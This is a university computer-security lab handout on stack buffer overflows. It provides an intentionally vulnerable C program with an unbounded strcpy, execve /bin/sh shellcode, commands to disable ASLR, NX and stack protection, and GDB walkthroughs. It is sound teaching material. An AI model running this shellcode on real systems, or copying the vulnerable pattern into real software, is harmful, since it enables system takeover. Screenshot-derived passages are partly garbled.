

计算机科学与工程系

Department of Computer Science and Engineering

CS 315 Computer Security Course

Lab 2: Buffer Overflows

Introduction

In this lab, you will learn how buffer overflows and other memory vulnerabilities are used to takeover vulnerable programs. The goal is to investigate a program I provide and then figure out how to use it to gain shell access to systems.

In 1996 Aleph One wrote the canonical paper on smashing the stack. You should read this as it gives a detailed description of how stack smashing works. Today, many compilers and operating systems have implemented security features, which stop the attacks described in the paper. However, it still provides very relevant background for newer attacks and (specifically) this lab assignment.

Aleph One: Smashing the Stack for Fun and Profit:

http://www1.telhai.ac.il/sources/private/academic/cs/557/2659/Materials/Smashing.pdf

Another (long) description of Buffer Overflows is here:

http://www.enderunix.org/docs/en/bof-eng.txt

Software Requirements

All required files and source code are packed in the provided Lab 2 virtual machine.

- The VMWare Software
 - <u>https://www.vmware.com/</u>
- The VirtualBox Software
 - <u>https://www.virtualbox.org/wiki/Downloads</u>
 - https://www.vmware.com/support/developer/ovf/
 - <u>https://www.mylearning.be/2017/12/convert-a-vmware-fusion-virtual-machine-to-virtualbox-on-mac/</u>

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- The Kali Linux, Penetration Testing Distribution
- GDB: The GNU Project Debugger
- GCC, the GNU Compiler Collection
- C source file including BOF.c, createBadfile.c, and testShellCode.c

Starting the Virtual Machine

The Kali Linux VM has all the required files. Select the VM named Lab2-BufferOverflows for this lab.



Login the Kali Linux with username root, and password [TBA in the class].

In the Kali Linux, you should be able to see a folder named Lab2-BufferOverflows. This file contains all of the source code for the lab 2.





Setting up the Environment

There are many protections in current compilers and operating systems to stop stack attacks like the one we want to do. We have to disable some security options to allow the exploit to work (Note that the VM image you get has configured the environemnt).

Disable Address Space Layout Randomization

Address Space Layout Randomization (ASLR) is a security features used in most Operating system today. ASLR randomly arranges the address spaces of processes, including stack, heap, and libraries. It provides a mechanism for making the exploitation hard to success. You can configure ASLR in Linux using the /proc/sys/kernel/randomize_va_space interface. The following values are supported:

0 – No randomization

- 1 Conservative randomization
- 2 Full randomization

Disable ASLR, run:

```
$ echo 0 > /proc/sys/kernel/randomize_va_space
```

Enable ASLR, run:

```
$ echo 2 > /proc/sys/kernel/randomize_va_space
```

Note that you will need root privilege to configure the interface. Using vi to modify the interface may have errors. The screenshot below shows the value of /proc/sys/kernel/randomize_va_space

However, this configuration will not survive after a reboot. You will have to configure this in sysctl. Add a file /etc/sysctl.d/01-disable-aslr.conf containing:

kernel.randomize_va_space = 0

This will permanently disable ASLR.



The screenshot below shows you the ASLR configuration. You can open a terminal and try it out.

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61	root@ka	ali-WSU:~/I	Desktop/Lab2-Bu	iffer0verflows#	cat /proc/sys	/ker	nel/ra	ndo	miz	
	e_va_sp	bace								
	rooteka	1 +_WCII •/	Dockton /Lab2_Pu	ufforOvorflowe#						
	rooteka	11-WSU:~/	Desktop/Lab2-Bu	ifferOverflows#	cat /otc/svec	+1 d	/01-di	sahi	10-	
	aslr.co	onf		in ter over 1 cows#	cut /etc/syst	ec.u	, or -ur	Sab		
	kernel	randomize	va space=0							
	root@ka	li-WSU:~/	Desktop/Lab2-Bu	ifferOverflows#						

Set compiler flags to disable security features

When you compile the vulnerable program (explain in the next section) with gcc, use the following compiler flags to disable the security features.

-z execstack

Turn off the NX protection to make the stack executable

-fno-stack-proector

Remove StackGuard that detects stack smashing exploitations

-g

Enable the debugging symbols



Overview

The goal of the exploitation is to teach you how buffer overflows work. **You must gain a shell by passing a malicious input into a vulnerable program**. The vulnerability takes as input a file named "badfile". Your job is to create a badfile that results in the vulnerable program producing a shell. Note that you also have a nop sled to make the vulnerability work even if your shellcode moves by a few bytes. In the Lab2-BufferOverflows folder, it contains the C files you need to use. The screenshot below shows that.

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	=	Desktop						
M	D	Documents						
X	Ð	Downloads						
	5	Music						
	Û	Pictures						
E	B	Videos						
8	亩	Trash						
	¢.	Computer						
	Sp	Browse Network						
	₫	Connect to Server						

BOF.c

In BOF.c there is an un-bounded strcpy, which means anything that is not nullterminated will overwrite the buffer boundaries and (hopefully) put some information into the stack that you will design. Your exploit must work with my version of BOF.c (can't change it to make your code work).



Open 🔻	F	BOF.c ~/Desktop/Lab2-BufferOverflows	Save		•	•	⊗
#include #include #include	<stdlib. <stdio.h <string.< td=""><td>h> > h></td><td></td><td></td><td></td><td></td><td></td></string.<></stdio.h </stdlib. 	h> > h>					
int buff	er0verflo	w(const char * str)					
t char	buffer[<mark>12</mark>];					
/* Th strcp	<mark>is line h</mark> y(buffer,	as a buffer overflow vulnerability. */ str);					
retur }	n 1;						
int main {	(int argc	, char ** argv)					
L	char a FILE *	String[<mark>512];</mark> badfile;					
	printf badfil fread(<pre>("Buffer overflow vulnerability starting up\n"); e = fopen("badfile", "r"); aString, sizeof(char), 512, badfile);</pre>					
	buffer	Overflow(aString);					
	printf	("buffer0verflow() function returned\n");					
	return	(1;					
}							
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To compile BOF.c, you need to add the compile flags mentioned.

\$ gcc –g –z execstack –fno-stack-protector BOF.c –o BOF





testShellCode.c

This program simply lets you test shell code itself. There are a lot of different "shell codes" you can find or create, and this is a good way to see what they do, and if they'll work for you (on your operating system).

The actual shellcode you are using is simply the assembly version of this C code:

```
#include <stdio.h>
int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
}
```

```
testShellCode.c
          F
                                                                                         =
 Open 🔻
                                                                                   Save
                                                                                              0 0
                                         ~/Desktop/Lab2-BufferOverflows
A program that creates a file containing code for launching shell
*/
#include <stdlib.h>
#include <stdio.h>
//const char code[] = "\xeb\x19\x31\xc0\x31\xd2\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd"\
       "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f"; // Say Hello
const char code[] = \
                /* Line 1:
'\x31\xc0"
                               xorl
                                        %eax,%eax
"\x50"
                   /* Line 2:
                                                          */
                                        %eax
                               pushl
"\x68""//sh"
                                                          */
                  /* Line 3: pushl
                                        $0x68732f2f
"\x68""/bin"
                  /* Line 4:
                                                          */ */ */
                                        $0x6e69622f
                               pushl
"\x89\xe3"
                   /* Line 5:
                                        %esp,%ebx
                               movl
"\x50"
                   /* Line 6:
                               pushl
                                        %eax
"\x53"
                                                                  ١
                  /* Line 7:
                               pushl
                                        %ebx
"\x89\xe1"
                  /* Line 8:
                                        %esp,%ecx
                               movl
                                                                  \
"\x99"
                   /* Line 9: cdql
"\xb0\x0b"
                   /* Line 10: movb
                                        $0x0b,%al
"\xcd\x80"
                   /* Line 11: int
                                        $0x80
;
int main(int argc, char ** argv)
 int (*func)();
 func = (int (*)()) code;
  (int)(*func)();
 return 0;
}
                                                            C 🔻 Tab Width: 8 🔻
                                                                                 Ln 17, Col 66 🛛 🔻
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```



createBadfile.c

This program writes out "badfile", however currently it is just full of nops (no ops). You need to modify it to place your shell code into it and cause the code to jump to the shellcode. The shellcode included already in badfile (as a char array) does work. You shouldn't need to modify it, but you're welcome to.

```
createBadfile.c
          Æ
                                                                                             Ξ
 Open 🔻
                                                                                       Save
                                                                                                  0
                                                                                                     •
                                                                                                         ~/Desktop/Lab2-BufferOverflows
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
//const char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd"\
       "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f"; // Say Hello
const char shellcode[] = \
"\x31\xc0" /* Line 1: xorl
                                        %eax,%eax
                /* Line 2: pushl
/* Line 3: pushl
/* Line 4: pushl
"\x50'
                                        %eax
"\x68""//sh"
                                        $0x68732f2f
"\x68""/bin"
                                        $0x6e69622f
                  /* Line 5:
"\x89\xe3"
                                        %esp,%ebx
                               movl
"\x50"
                  /* Line 6:
                               pushl
                                        %eax
                  /* Line 7:
"\x53"
                               pushl
                                        %ebx
"\x89\xe1"
                  /* Line 8:
                               movl
                                        %esp,%ecx
                  /* Line 9: cdql
"\x99"
"\xb0\x0b"
                   /* Line 10: movb
                                        $0x0b,%al
"\xcd\x80"
                   /* Line 11: int
                                        $0x80
:
int main(int argc, char ** argv) {
        char buffer[512];
        FILE *badfile;
        /* Init the buffer with nop (0x90) */
        memset(&buffer, 0x90, 512);
        /* Save to badfile. */
        badfile = fopen("badfile", "w+");
        fwrite(buffer, 512, 1, badfile);
        fclose(badfile);
        printf("Completed writing\n");
        return 0;
                                                                C 🔻 Tab Width: 8 🔻
                                                                                      Ln 1, Col 1
                                                                                                       INS
```

To compile the testShellCode.c and createBadfile.c, you do not need to add the compile flags mentioned early. You can just simplely compile it with gcc





Starting the Exploitation

There are really two challenges in the lab. To execute the shellcode you want to overwrite the return address in the *bufferOverflow()* function. You must make the return address of that function point to your shellcode.

1. You need to figure out what memory address the return address is stored in.

2. Then you need to figure out the address of your shellcode in memory, and write the shellcode's address into the return address you found in step 1.

In the lab instruction, I will give you some hints for the step 1.

Finding Return Address on the Stack

In order to find the return address on stacks, we first use GDB, The GNU Project Debugger, to take a look at the assembly code. You can find more information about GDB from here: <u>https://www.gnu.org/software/gdb/</u> Note that you can also use tool, *objdump*, to read the assembly code.

\$ gdb BOF

root@kali-WSU: ~/Desktop/Lab2-BufferOverflows	•	•	8
File Edit View Search Terminal Help			
<pre>root@kali-WSU:-/Desktop/Lab2-BufferOverflows# root@kali-WSU:-/Desktop/Lab2-BufferOverflows# gdb BOF GNU gdb (Debian 7.7.1+dfsg-5) 7.7.1 Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http: gnu.org="" gpl.html<br="" licenses="">This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i586-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http: bugs="" gdb="" software="" www.gnu.org=""></http:>. Type <return> to continue, or q <return> to quit Find the GDB manual and other documentation resources online at: <http: documentation="" gdb="" software="" www.gnu.org=""></http:>. For help, type "help". Type "apropos word" to search for commands related to "word" Reading symbols from BOFdone. (gdb)</return></return></http:></pre>	~		



First, we disassemble the main() function of the BOF program. We find the bufferOverflow() function in the main() function (type disas main in the GDB). Then, we disassemble the bufferOverflow() function, which has a vulnerability in it.

\$ (gdb) disas main

\$ (gdb) disas bufferOverflow

	root@kal	-WSU: "/Desktop/Lab2-BufferOverflows	Θ	U	<u> </u>
1	File Edit View Search Terminal	Help			
	(gdb) disas bufferOverflow				
a	Dump of assembler code for	unction bufferOverflow:			
	0x0804849b <+0>: pus	n/%ebp			
	0x0804849c <+1>: mov	%esp,%ebp			
	0x0804849e <+3>: sub	\$0x18,%esp			
	0x080484a1 <+6>: sub	\$0x8,%esp			
	0x080484a4 <+9>: pus	1 0x8(%ebp)			
	0x080484a7 <+12>: lea	-0x14(%ebp),%eax			
	0x080484aa <+15>: pus	%eax			
	0x080484ab <+16>: cal	0x8048350 <strcpy@plt></strcpy@plt>			
	0x080484b0 <+21>: add	\$0x10,%esp			
	0x080484b3 <+24>: mov	\$0x1,%eax			
	0x080484b8 <+29>: lea	re			
	0x080484b9 <+30>: ret				
	End of assembler dump.				
	(gdb)				

You need to understand the assembly code to find where the return address is on the stack. Next, type run in the GDB to execute the BOF program.

\$ (gdb) run

	root@kali-WSU: ~/Desktop/Lab2-BufferOverflows	•	Θ	8
1	File Edit View Search Terminal Help			
a	0x080484a4 <+9>: pushl 0x8(%ebp) 0x080484a7 <+12>: lea -0x14(%ebp),%eax 0x080484aa <+15>: push %eax 0x080484ab <+16>: call 0x8048350 <strcpy@plt> 0x080484b0 <+21>: add \$0x10,%esp 0x080484b3 <+24>: mov \$0x1,%eax 0x080484b8 <+29>: leave 0x080484b9 <+30>: ret End of assembler dump.</strcpy@plt>			
	(gdb) run Starting program: /root/Desktop/Lab2-Buffer0verflows/BOF Buffer overflow vulnerability starting up Program received signal SIGSEGV, Segmentation fault. 0x90909090 in ?? () (gdb)			

As we expected, the BOF program generates an exception, segmentation fault. The Instruction Pointer (EIP) is 0x90909090. This is because we put NOP sleds on the badfile that overflows the buffer in the BOF program.



You also can see more register information by execute info register in the GDB

\$ (gdb) info register

	•	•	⊗			
File Edit View Se	arch Termir	nal Help				
f(gdb) info regi	ster					
eax	0×1	1				
ecx	0xbffff41	0	-1073744880			
edx	0xbffff3d	8	-1073744936			
ebx	0xb7fb600	0	-1208262656			
Mespe Tools (0xbffff1f	0	0xbffff1f0			
ebp (0x9090909	0	0x90909090			
esi (0×0	0 /				
edi (0×0	0				
eip (0x9090909	0	0x90909090			
eflags (0x10282	[SF IF	RF]			
cs (0x73	115				
ss (0x7b	123				
ds (0x7b	123				
es (0x7b	123				
fs (0×0	0				
gs (0x33	51				
(gdb)						

Note that you can always type help in the GDB to learn the commands.



Assignments for the Lab 2

A zip file containing:

- 1. Your updated createBadfile.c that generates the input for the BOF program
- 2. A copy of the badfile. This must gengerate a shell when BOF runs from the command line in the VM
- 3. A screenshot of using BOF program to gain a shell (see simple screenshot below)
- 4. A text file with answers to the following questions:
 - a. What happens when you compile without "-z execstack"?
 - b. What happens if you enable ASLR? Does the return address change?
 - c. Does the address of the buffer[] in memory change when you run BOF using GDB, /home/root/Desktop/Lab2-BufferOverflows/BOF, and ./BOF?

Happy Exploiting!

root@kali-WSU: ~/Desktop/Lab2-BufferOverflows									•	8			
File E	dit V	iew	Search	Terminal	Help								
root@ This ^o root@ Buffe #	kali is a kali r ove	•WSU dem •WSU erfl	:~/Des o by i :~/Des ow vul	ktop/La nstruct ktop/La nerabil	b2-Buff or b2-Buff ity sta	erOverflows# erOverflows# arting up	echo ./BOF	"This is	a demo by	y instr Instr BOF	ucto	or"	
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